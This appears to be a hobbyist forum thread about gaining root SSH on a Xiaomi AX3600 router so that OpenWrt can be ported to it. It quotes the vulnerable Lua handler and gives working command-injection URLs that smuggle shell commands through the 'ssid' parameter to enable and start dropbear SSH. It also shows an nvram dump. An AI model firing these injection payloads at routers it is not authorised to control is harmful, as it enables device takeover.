Adding OpenWrt support for Xiaomi AX3600 (Part 1)

well, vendor is claiming that firmware is OpenWRT based

Intelligent router operating system MiWiFi ROM based on OpenWRT deep customization

Well, of of QCA products run their QSDK which is an old fork of 15.05.1, that has not so much resemblance of OpenWrt

1 Like

Yep:
https://wiki.codeaurora.org/xwiki/bin/QSDK/#HCAFDownloadSteps:
https://source.codeaurora.org/quic/qsdk/oss/system/openwrt/tree/?h=NHSS.QSDK.12.0.5.r1

got a Chinese one to Germany
all I can do is to set it as a WiFi-AP - but no admin (no browser page, Mi-WiFi-App doesnt find/identify it)
another brick in my yard? hopefully not!any idea you can share how to even get Mi-WiFi-App connected?

function xxx()
    local XQFunction = require("xiaoqiang.common.XQFunction")
    local LuciUtil = require("luci.util")
    local result = {
        ["code"] = 0
    }

    local ssid = LuciHttp.formvalue("ssid")
    local bssid = LuciHttp.formvalue("bssid")
    local uid = LuciHttp.formvalue("user_id")

    XQLog.log(debug_level, "ssid = "..ssid)
    XQLog.log(debug_level, "bssid = "..bssid)
    XQLog.log(debug_level, "uid = "..uid)
    if XQFunction.isStrNil(ssid) 
        or XQFunction.isStrNil(bssid) 
        or XQFunction.isStrNil(uid) then
        result.code = 1523
    end
    if result.code ~= 0 then
        result["msg"] = XQErrorUtil.getErrorMessage(result.code)
    else
        XQFunction.forkExec("connect -s "..ssid.." -b "..bssid.. " -u "..uid)
    end
    LuciHttp.write_json(result)
end

I think I've found the code to inject

2 Likes

How to get SSH

1.Downgrade to 1.0.17 rom

http://cdn.cnbj1.fds.api.mi-img.com/xiaoqiang/rom/r3600/miwifi_r3600_firmware_5da25_1.0.17.bin

2.Web inject like below

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3Bnvram%20set%20ssh%5Fen%3D1%3B%20nvram%20commit%3B

3.The following code in /etc/init.d/dropbear needs to be commented out and reboot to get ssh

    if [ "$flg_ssh" != "1" -o "$channel" = "release" ]; then
            return 0
    fi

4.The default root password is calculated by SN, and the algorithm is the same as before

That's all, enjoy it

8 Likes

Step 2-3 can use url below to inject:

http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h; cp /etc/init.d/dropbear /etc/init.d/dropbear_startup_backup; sed -i '/\"\$flg_ssh\"\ \!\=\ \"1\"\ \-o\ \"\$channel\"\ \=\ \"release\"/, 2d' /etc/init.d/dropbear; /etc/init.d/dropbear enable; /etc/init.d/dropbear start;

It backs up /etc/init.d/dropbear to /etc/init.d/dropbear_backup and create a new /etc/init.d/dropbear

Great job @LonGDikE

3 Likes

Hehe, I really should have taken a closer look at the AX3600 ubifs image when someone mentioned that all the lua wasn't obfuscated anymore.

Would have reaaaaally simplified things.

Although I think ath11k is in pretty early stages and openwrt does not pull in the ath11k firmware right now either. I don't even think there's a target for the cpu yet.

Good work. :slight_smile:

Should be a fun platform to work on (assuming the boot chain isn't too locked down).

I wish I had more knowledge what is going on here, to help you guys :smiley: But i am only .Net Developer in Microsoft world... In my free time i keep reading of forum and all openwrt stuff, soo maybe someday i can help :slight_smile:

Yes, good. I'm just giving an example. It's OK to delete 3 rows with sed, but it feels dangerous if someone accidentally operate it several times

Yes, at present, only lua script in ROM of 1.0.17 is not obfuscated

I just updated the injection URL, it will deleted 3 lines after the matched line, which is much safer.

1 Like

:+1:
Can you modify the previous cmds to fit it? It's a little simple. I don't study linux commands and regularities very much. Hmmm.....
sed -i ":x:N:s/if \[.*\; then\n.*return 0\n.*fi/#tb/;b x" /etc/init.d/dropbear;

1 Like

Done.

And I successfully obtained shell permission of the device

2 Likes

That's nice.
Can you check if it has any kind of boot verification?

There is a problem with the cmds I gave. An error will be reported during execution. I want you to help me modify it to be available...
Haha...

1 Like

could you tell me how to verify if there is any boot verification?

and here is what I got from nvram show(I removed some private information)

root@XiaoQiang:~# nvram show
CountryCode=CN
Router_unconfigured=0
boot_wait=off
bootargs=ubi.mtd=rootfs_1 root=mtd:ubi_rootfs rootfstype=squashfs rootwait
bootcmd=tftp
bootdelay=5
color=101
fdt_high=0x4A400000
flag_boot_rootfs=1
flag_boot_success=1
flag_boot_type=2
flag_flash_permission=1
flag_last_success=1
flag_ota_reboot=0
flag_show_upgrade_info=1
flag_try_sys1_failed=0
flag_try_sys2_failed=0
flash_type=2
fsbootargs=ubi.mtd=rootfs_1 root=mtd:ubi_rootfs rootfstype=squashfs
ipaddr=192.168.31.1
mode=Router
model=R3600
mtddevname=fs
mtddevnum=0
mtdids=nand0=nand0
mtdparts=mtdparts=nand0:0x23c0000@0x2dc0000(fs),
partition=nand0,0
restore_defaults=0
serverip=192.168.31.100
soc_version_major=2
soc_version_minor=0
ssh_en=1
stderr=serial
stdin=serial
stdout=serial
telnet_en=0
uart_en=0
wl0_radio=1
wl0_ssid=Xiaomi_5G
wl1_radio=1
wl1_ssid=Xiaomi
wl2_ssid=Xiaomi_E81A
nv_wan_type=
1 Like

Does the power supply have a German plug or just an adapter?

Not sure how QC's secure boot works, but try dumping uboot and kernel, see if they have anything like cert or signature attached.

If you order from china it has the chinese plug and the seller usually includes an adapter. If Xiaomi sells it in Europe they will include a european power adapter. It is the same for other devices like the xiaomi desktop lamp.